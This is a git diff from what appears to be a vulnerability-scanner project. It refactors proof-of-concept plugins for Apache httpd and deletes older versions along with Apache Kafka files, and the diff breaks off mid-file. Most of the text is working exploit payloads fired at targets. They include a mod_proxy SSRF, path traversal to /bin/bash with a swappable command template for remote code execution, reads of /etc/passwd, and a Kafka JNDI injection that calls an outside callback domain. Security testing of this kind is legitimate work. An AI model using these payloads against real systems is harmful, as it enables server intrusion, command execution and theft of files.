AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://example.com/', - }, -] - -def cve_2021_40438_scan(clients): - ''' httpd的mod_proxy存在服务器端请求伪造(SSRF) - 该漏洞允许未经身份验证的远程攻击者使 httpd 服务器将请求转发到任意服务器 - ''' - hackClient = clients.get('hackClient') +''' +Apache httpd 2.4.48 mod_proxy SSRF + CVE-2021-40438 + Payload: https://vulhub.org/#/environments/httpd/CVE-2021-40438/ + +httpd的mod_proxy存在服务器端请求伪造(SSRF) + 该漏洞允许未经身份验证的远程攻击者使 httpd 服务器将请求转发到任意服务器 +''' + +from PluginManager import Vuln_Scan + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + { + 'path': '?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://example.com/', + }, + ] + + def POC(self, clients): + hackClient = clients.get('hackClient') + + vul_info = { + 'app_name': 'ApacheHttpd', + 'vul_type': 'SSRF', + 'vul_id': 'CVE-2021-40438', + } + + for payload in self.payloads: + path = payload['path'] + + res = hackClient.request( + 'get', + path, + location=True, + vul_info=vul_info + ) + if res is None: + continue + + if (('This domain is for use in illustrative examples in documents.' in res.text) + and ('domain in literature without prior coordination or asking for permission.' in res.text) + ): + results = { + 'Target': res.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + return None - vul_info = { - 'app_name': 'ApacheHttpd', - 'vul_type': 'SSRF', - 'vul_id': 'CVE-2021-40438', - } - - for payload in cve_2021_40438_payloads: - path = payload['path'] - - res = hackClient.request( - 'get', - path, - location=True, - vul_info=vul_info - ) - if res is None: - continue - - if (('This domain is for use in illustrative examples in documents.' in res.text) - and ('domain in literature without prior coordination or asking for permission.' in res.text) - ): - results = { - 'Target': res.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res - } - return results - return None + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/ApacheHttpd/apache-httpd-cve-2021-41773-rce-fileread.py b/payloads/ApacheHttpd/apache-httpd-cve-2021-41773-rce-fileread.py new file mode 100644 index 0000000..46ba8cf --- /dev/null +++ b/payloads/ApacheHttpd/apache-httpd-cve-2021-41773-rce-fileread.py @@ -0,0 +1,114 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Apache httpd 2.4.49 路径遍历 + CVE-2021-41773 + Payload: https://vulhub.org/#/environments/httpd/CVE-2021-41773/ + Paylaod: https://github.com/thehackersbrain/CVE-2021-41773/blob/main/exploit.py + +在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷, + 攻击者可以使用路径遍历攻击将URL映射到网站根目录预期之外的文件 + 在特定情况下, 攻击者可构造恶意请求执行系统命令 +''' + +from PluginManager import Vuln_Scan +from lib.tool.md5 import random_md5 +from lib.tool import check + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + { + 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash', + 'data': 'echo Content-Type: text/plain; echo; {RCECOMMAND}' + }, + { + 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash', + 'data': 'echo;{RCECOMMAND}' + }, + { + 'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash', + 'data': 'echo Content-Type: text/plain; echo; {RCECOMMAND}' + }, + { + 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh', + 'data': 'echo Content-Type: text/plain; echo; {RCECOMMAND}' + }, + { + 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh', + 'data': 'echo;{RCECOMMAND}' + }, + { + 'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh', + 'data': 'echo Content-Type: text/plain; echo; {RCECOMMAND}' + }, + # * 无法RCE, 只能FileRead + { + 'path': 'icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd', + 'data': None + }, + { + 'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd', + 'data': None + }, + { + 'path': 'icons/.%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts', + 'data': None + }, + { + 'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts', + 'data': None + }, + ] + + def POC(self, clients): + hackClient = clients.get('hackClient') + + vul_info = { + 'app_name': 'ApacheHttpd', + 'vul_type': 'RCE/FileRead', + 'vul_id': 'CVE-2021-41773', + } + + for payload in self.payloads: + path = payload['path'] + data = payload['data'] + random_str = random_md5(6) # * 随机6位字符串 + + if data: # * 有POST数据则RCE, 否则为FileRead + RCEcommand = 'echo ' + random_str + data = data.format(RCECOMMAND=RCEcommand) + + res = hackClient.request( + 'post', + path, + data=data, + vul_info=vul_info + ) + else: + res = hackClient.request( + 'get', + path, + vul_info=vul_info + ) + if res is None: + continue + + if ( + (check.check_res(res.text, random_str)) + or (check.check_res_fileread(res.text)) + ): + results = { + 'Target': res.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/ApacheHttpd/apache-httpd-cve-2021-42013-rce-fileread.py b/payloads/ApacheHttpd/apache-httpd-cve-2021-42013-rce-fileread.py new file mode 100644 index 0000000..a89da78 --- /dev/null +++ b/payloads/ApacheHttpd/apache-httpd-cve-2021-42013-rce-fileread.py @@ -0,0 +1,103 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Apache HTTP Server 2.4.50 路径遍历 + CVE-2021-42013 + Payload: https://vulhub.org/#/environments/httpd/CVE-2021-42013/ + +CVE-2021-42013是CVE-2021-41773的绕过, 使用.%%32%65/ +''' + +from PluginManager import Vuln_Scan +from lib.tool.md5 import random_md5 +from lib.tool import check + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + { + 'path': 'cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash', + 'data': 'echo;{RCECOMMAND}' + }, + { + 'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash', + 'data': 'echo;{RCECOMMAND}' + }, + { + 'path': 'cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh', + 'data': 'echo;{RCECOMMAND}' + }, + { + 'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh', + 'data': 'echo;{RCECOMMAND}' + }, + # * 无法RCE, 只能FileRead + { + 'path': 'icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd', + 'data': '' + }, + { + 'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd', + 'data': '' + }, + { + 'path': 'icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/C:/Windows/System32/drivers/etc/hosts', + 'data': '' + }, + { + 'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/C:/Windows/System32/drivers/etc/hosts', + 'data': '' + } + ] + + def POC(self, clients): + hackClient = clients.get('hackClient') + + vul_info = { + 'app_name': 'ApacheHttpd', + 'vul_type': 'RCE/FileRead', + 'vul_id': 'CVE-2021-42013', + } + + for payload in self.payloads: + path = payload['path'] + data = payload['data'] + random_str = random_md5(6) # * 随机6位字符串 + + if data: # * 有POST数据则RCE, 否则为FileRead + RCEcommand = 'echo ' + random_str + data = data.format(RCECOMMAND=RCEcommand) + + res = hackClient.request( + 'get', + path, + data=data, + vul_info=vul_info + ) + else: + res = hackClient.request( + 'get', + path, + vul_info=vul_info + ) + if res is None: + continue + + if ( + (check.check_res(res.text, random_str)) + or (check.check_res_fileread(res.text)) + ): + results = { + 'Target': res.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/ApacheHttpd/cve_2021_41773.py b/payloads/ApacheHttpd/cve_2021_41773.py deleted file mode 100644 index 8b8ece8..0000000 --- a/payloads/ApacheHttpd/cve_2021_41773.py +++ /dev/null @@ -1,98 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.tool.md5 import random_md5 -from lib.tool import check - -cve_2021_41773_payloads = [ - { - 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash', - 'data': 'echo Content-Type: text/plain; echo; {RCECOMMAND}' - }, - { - 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash', - 'data': 'echo;{RCECOMMAND}' - }, - { - 'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash', - 'data': 'echo Content-Type: text/plain; echo; {RCECOMMAND}' - }, - { - 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh', - 'data': 'echo Content-Type: text/plain; echo; {RCECOMMAND}' - }, - { - 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh', - 'data': 'echo;{RCECOMMAND}' - }, - { - 'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh', - 'data': 'echo Content-Type: text/plain; echo; {RCECOMMAND}' - }, - # * 无法RCE, 只能FileRead - { - 'path': 'icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd', - 'data': None - }, - { - 'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd', - 'data': None - }, - { - 'path': 'icons/.%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts', - 'data': None - }, - { - 'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts', - 'data': None - }, -] - -def cve_2021_41773_scan(clients): - ''' 在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷, - 攻击者可以使用路径遍历攻击将URL映射到网站根目录预期之外的文件 - 在特定情况下, 攻击者可构造恶意请求执行系统命令 - ''' - hackClient = clients.get('hackClient') - - vul_info = { - 'app_name': 'ApacheHttpd', - 'vul_type': 'RCE/FileRead', - 'vul_id': 'CVE-2021-41773', - } - - for payload in cve_2021_41773_payloads: - path = payload['path'] - data = payload['data'] - random_str = random_md5(6) # * 随机6位字符串 - - if data: # * 有POST数据则RCE, 否则为FileRead - RCEcommand = 'echo ' + random_str - data = data.format(RCECOMMAND=RCEcommand) - - res = hackClient.request( - 'post', - path, - data=data, - vul_info=vul_info - ) - else: - res = hackClient.request( - 'get', - path, - vul_info=vul_info - ) - if res is None: - continue - - if ( - (check.check_res(res.text, random_str)) - or (check.check_res_fileread(res.text)) - ): - results = { - 'Target': res.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res - } - return results - return None diff --git a/payloads/ApacheHttpd/cve_2021_42013.py b/payloads/ApacheHttpd/cve_2021_42013.py deleted file mode 100644 index 9f5b3c2..0000000 --- a/payloads/ApacheHttpd/cve_2021_42013.py +++ /dev/null @@ -1,87 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.tool.md5 import random_md5 -from lib.tool import check - -cve_2021_42013_payloads = [ - { - 'path': 'cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash', - 'data': 'echo;{RCECOMMAND}' - }, - { - 'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash', - 'data': 'echo;{RCECOMMAND}' - }, - { - 'path': 'cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh', - 'data': 'echo;{RCECOMMAND}' - }, - { - 'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh', - 'data': 'echo;{RCECOMMAND}' - }, - # * 无法RCE, 只能FileRead - { - 'path': 'icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd', - 'data': '' - }, - { - 'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd', - 'data': '' - }, - { - 'path': 'icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/C:/Windows/System32/drivers/etc/hosts', - 'data': '' - }, - { - 'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/C:/Windows/System32/drivers/etc/hosts', - 'data': '' - } -] - -def cve_2021_42013_scan(clients): - ''' CVE-2021-42013是CVE-2021-41773的绕过, 使用.%%32%65/ ''' - hackClient = clients.get('hackClient') - - vul_info = { - 'app_name': 'ApacheHttpd', - 'vul_type': 'RCE/FileRead', - 'vul_id': 'CVE-2021-42013', - } - - for payload in cve_2021_42013_payloads: - path = payload['path'] - data = payload['data'] - random_str = random_md5(6) # * 随机6位字符串 - - if data: # * 有POST数据则RCE, 否则为FileRead - RCEcommand = 'echo ' + random_str - data = data.format(RCECOMMAND=RCEcommand) - - res = hackClient.request( - 'get', - path, - data=data, - vul_info=vul_info - ) - else: - res = hackClient.request( - 'get', - path, - vul_info=vul_info - ) - if res is None: - continue - - if ( - (check.check_res(res.text, random_str)) - or (check.check_res_fileread(res.text)) - ): - results = { - 'Target': res.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res - } - return results - return None diff --git a/payloads/ApacheHttpd/main.py b/payloads/ApacheHttpd/main.py deleted file mode 100644 index 775ad83..0000000 --- a/payloads/ApacheHttpd/main.py +++ /dev/null @@ -1,45 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' -httpd是Apache超文本传输协议(HTTP)服务器的主程序: https://httpd.apache.org/download.cgi - Apache httpd扫描类: - 1. Apache httpd 2.4.48 mod_proxy SSRF - CVE-2021-40438 - Payload: https://vulhub.org/#/environments/httpd/CVE-2021-40438/ - - 2. Apache httpd 2.4.49 路径遍历 - CVE-2021-41773 - Payload: https://vulhub.org/#/environments/httpd/CVE-2021-41773/ - Paylaod: https://github.com/thehackersbrain/CVE-2021-41773/blob/main/exploit.py - - 3. Apache HTTP Server 2.4.50 路径遍历 - CVE-2021-42013 - Payload: https://vulhub.org/#/environments/httpd/CVE-2021-42013/ - -file:///etc/passwd -file:///C:/Windows/System32/drivers/etc/hosts -file:///C:\Windows\System32\drivers\etc\hosts -''' - -# from lib.initial.config import config -from lib.tool.thread import thread -from payloads.ApacheHttpd.cve_2021_40438 import cve_2021_40438_scan -from payloads.ApacheHttpd.cve_2021_41773 import cve_2021_41773_scan -from payloads.ApacheHttpd.cve_2021_42013 import cve_2021_42013_scan - -class ApacheHttpd(): - def __init__(self): - self.app_name = 'ApacheHttpd' - - def addscan(self, clients, vuln=None): - if vuln: - return eval('thread(target={}_scan, clients=clients)'.format(vuln)) - - return [ - thread(target=cve_2021_40438_scan, clients=clients), - thread(target=cve_2021_41773_scan, clients=clients), - thread(target=cve_2021_42013_scan, clients=clients) - ] - -httpd = ApacheHttpd() diff --git a/payloads/ApacheKafka/cve_2023_25194.py b/payloads/ApacheKafka/cve_2023_25194.py deleted file mode 100644 index ee2fd1b..0000000 --- a/payloads/ApacheKafka/cve_2023_25194.py +++ /dev/null @@ -1,95 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.api.dns import dns -from lib.tool.md5 import random_md5 -from time import sleep - -base_data = '''{"name": "test", - "config": - { - "connector.class":"io.debezium.connector.mysql.MySqlConnector", - "database.hostname": "localhost", - "database.port": "3306", - "database.user": "root", - "database.password": "123456", - "database.dbname": "mysql", - "database.sslmode": "SSL_MODE", - "database.server.id": "1234", - "database.server.name": "localhost", - "table.include.list": "MYSQL_TABLES", - "tasks.max":"1", - "topic.prefix": "aaa22", - "debezium.source.database.history": "io.debezium.relational.history.MemoryDatabaseHistory", - "schema.history.internal.kafka.topic": "aaa22", - "schema.history.internal.kafka.bootstrap.servers": "localhost:9092", - "database.history.producer.security.protocol": "SASL_SSL", - "database.history.producer.sasl.mechanism": "PLAIN", - "database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\\"PAYLOAD\\" useFirstPass=\\"true\\" serviceName=\\"x\\" debug=\\"true\\" group.provider.url=\\"xxx\\";" - } -}''' - -cve_2023_25194_payloads = [ - { - 'path': 'connectors', - 'data': base_data.replace('PAYLOAD', 'ldap://DNSDOMAIN'), - }, - { - 'path': 'connectors', - 'data': base_data.replace('PAYLOAD', 'rmi://DNSDOMAIN'), - }, - { - 'path': 'connectors', - 'data': base_data.replace('PAYLOAD', 'dns://DNSDOMAIN'), - }, - { - 'path': 'connectors', - 'data': base_data.replace('PAYLOAD', 'http://DNSDOMAIN'), - }, -] - -def cve_2023_25194_scan(clients): - ''' 攻击者在可以控制Apache Kafka Connect 客户端的情况下 - 可通过SASL JAAS 配置和基于 SASL 的安全协议在其上创建或修改连接器 - 触发JNDI代码执行漏洞 - ''' - client = clients.get('reqClient') - sessid = '3b12aef95938e027ecb9e88fc9315d11' - - vul_info = { - 'app_name': 'ApacheKafka', - 'vul_type': 'RCE', - 'vul_id': 'CVE-2023-25194', - } - - headers = { - 'Content-Type': 'application/json' - } - - for payload in cve_2023_25194_payloads: - md = random_md5() # * 随机md5值, 8位 - dns_domain = md + '.' + dns.domain(sessid) # * DNSLOG域名 - - path = payload['path'] - data = payload['data'].replace('DNSDOMAIN', dns_domain) - - res = client.request( - 'get', - path, - data=data, - headers=headers, - allow_redirects=False, - vul_info=vul_info - ) - if res is None: - continue - - sleep(3) # * dns查询可能较慢, 等一会 - if (dns.result(md, sessid)): - results = { - 'Target': res.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res - } - return results - return None diff --git a/payloads/ApacheKafka/main.py b/payloads/ApacheKafka/main.py deleted file mode 100644 index 6736a14..0000000 --- a/payloads/ApacheKafka/main.py +++ /dev/null @@ -1,34 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' -(还未测试准确性) - -Apache Kafka 是一个开源分布式事件流平台,可用于高性能数据管道、流分析、数据集成和任务关键型应用程序 - Apache Kafka扫描类: - Apache Kafka Connect 远程代码执行 - CVE-2023-25194 - Payload: https://github.com/ohnonoyesyes/CVE-2023-25194 - -file:///etc/passwd -file:///C:/Windows/System32/drivers/etc/hosts -file:///C:\Windows\System32\drivers\etc\hosts -''' - -# from lib.initial.config import config -from lib.tool.thread import thread -from payloads.ApacheKafka.cve_2023_25194 import cve_2023_25194_scan - -class ApacheKafka(): - def __init__(self): - self.app_name = 'ApacheKafka' - - def addscan(self, clients, vuln=None): - if vuln: - return eval('thread(target={}_scan, clients=clients)'.format(vuln)) - - return [ - 